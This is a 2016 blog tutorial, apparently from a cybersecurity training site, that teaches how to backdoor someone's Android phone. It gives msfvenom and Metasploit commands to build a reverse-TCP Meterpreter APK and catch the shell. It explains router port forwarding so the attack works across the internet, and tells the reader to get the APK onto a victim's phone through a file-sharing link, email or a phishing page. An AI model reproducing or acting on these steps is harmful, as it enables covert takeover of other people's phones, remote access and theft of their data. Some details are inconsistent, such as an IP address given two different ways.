Call Us : +91-771045-0011 | +91-771045-0022

How to Hack An Android Phone?

2016-11-09

Category : Malwares

How to Hack An Android Phone?

Hello friends, Today we are going to learn ,how to create a hidden Door or a backdoor to hack someone's android phone.

This is a crazy article and you will find it interesting .

Before We start, we need to get familair with some of the basic terms.


Metasploit =A tool for developing and executing exploit code against a remote target machine

Meterpretor=An advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

Msfconsole=It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF

Note : word written under // - - - - - - - - - -// are only comments

Requirements:

Software requirements= kali linux or backtrack, metasploit (build in kali/backtrack),universal serial bus tool

Hardware requirements= pen drive at least 4 gb


Step 1:-

First of all, boot your kali or backtrack into the usb using tool universal serial bus or any other tool.Here i will use kali linux as my pentesting OS

Boot your kali live and open terminal



Step 2:-

Type


- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.101 R LPORT=4444 -o /var/hack.apk

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -


Here, the words used represent the following meaning .

1.msfvenom = To create a payload

2. -p = specifying type of payload

3. Android = which Operating System or type of device

4. Meterpreter=Part of metasploit helpful in creating extensible payload

5.reverse_tcp=we set up a listener first on our device, the target machine acts as a client connecting to it , and then finally the we receives the shell(reverse_tcp)

6. LHOST=198.168.0.101


NOTE: It Is my private IP assigned by my router,this private ip could only be used if you are attacking within your network.


For WAN(Wide Area Network or globally) attacking :Do specify ,the PUBLIC IP address provided by your ISP or you can check your Pubic IP at https://www.whatismyip.com/ .public ip is totally different from private ip.Also you need to do Port Forwarding.

Port Forwarding :

Suppose ,I have TP-LINK router,almost every router has same interface. So considering TP-Link, i will teach you port forwarding.

(a).First check your,gateway ip and private ip by typing in command prompt in windows


 - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

ipconfig

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -


now copy your default gateway ip ,and paste In your browser.Now you will be asked to enter password and username.

Enter default username = admin and and password =admin

Now see at left corner drop menu and click on forwarding and go to virtual servers.

set the following values:


Service Port= 4444 // enter your port you want to use //

Internal port= 4444 // same as above //

IP Address = 192.168.0.101 // your private ip //

Protocol= set to ALL

Status= Enabled

Common Service Port = //leave it to default setting //



Save it and close the page in browser.

7.LPORT=4444

8. -o =output location of file with name(hack.apk)

Hit enter.

Now u will see in terminal


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

No plateform was ----------------

- - - - - - - - - - -

- - - - - - - -

Payload size :200 bytes // any no. of bytes

Saved as : - - - -

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -


After doing this,

Either simply place the hack.apk file to someone phone via sharing or by giving

Him a link which will download this hack.apk file to his phone.

You can use the following website for creating a live link

http://wikisend.com/

Upload your file and get your link .Now redirect him or mail link him in any form by phishing page or mailing respectively.


Step 3:- type


- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

Msfconsole

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -


Now metasploit framework will open


- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

Msf use multi/handler

Msf exploit(handler) set payload android/meterpreter/reverse_tcp // here you must enter your private ip address ,as you are a listener now.You want to fetch data from victim device.//

Msf exploit(handler) set LHOST 192.168.0.101

Msf exploit(handler) set LPORT 4444

Msf exploit(handler) exploit

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

Now you machine is listening  to victim,when the victim install the hack.apk file in his andoid phone ,you will find a session will be opened .

Now you can do what you want.

For help or command list

Type

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

?

// or //

-h

- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - -

Hurray ,You are done ,

VICTIM IS HACKED .

Thanks for reading ,keep sharing.



Contact Us

+91-771045-0011

Request more information

suggested for you

Proudly Operated from India

© 2016 Copyrights. All Rights Reserved

See more of Cyber Intelligence by logging in.
Connect with cyber security experts,Discover job opportunities,Online Training, Information Security Advisory and lot more.

Sign Up Log In